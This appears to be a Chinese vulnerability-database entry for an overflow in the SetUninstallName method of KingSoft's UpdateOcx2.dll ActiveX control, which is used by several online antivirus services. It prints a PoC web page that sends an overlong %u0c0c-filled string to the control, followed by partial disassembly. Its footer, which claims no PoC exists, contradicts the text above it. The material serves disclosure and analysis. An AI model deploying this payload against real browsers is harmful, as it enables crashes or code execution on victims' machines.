KingSoft UpdateOcx2.dll...

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

金山在线杀毒,百度安全中心在线杀毒,雅虎助手等使用的在线杀毒引擎均受影响. PoC代码: ----------------------------------------------------------------------------------- <object classid='clsid:D82303B7-A754-4DCB-8AFC-8CF99435AACE' id='target1'></object> <object classid='clsid:D82303B7-A754-4DCB-8AFC-8CF99435AACE' id='target2'></object> <script> var str1 = ""; while (str1.length < 914) { str1 += unescape("%u0c0c"); } target1.SetUninstallName(str1); </script> ----------------------------------------------------------------------------------- 分析: .text:1000737B ; DWORD __stdcall SetUninstallName(LPVOID this_ptr, LPVOID bsUninstallName) .text:1000737B SetUninstallName proc near ; DATA XREF: .rdata:1003186C o .text:1000737B ; .rdata:10031A64 o .text:1000737B .text:1000737B this_ptr = dword ptr 4 .text:1000737B bsUninstallName = dword ptr 8 .text:1000737B .text:1000737B mov eax, [esp+this_ptr] .text:1000737F push [esp+bsUninstallName] .text:10007383 add eax, 20h...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息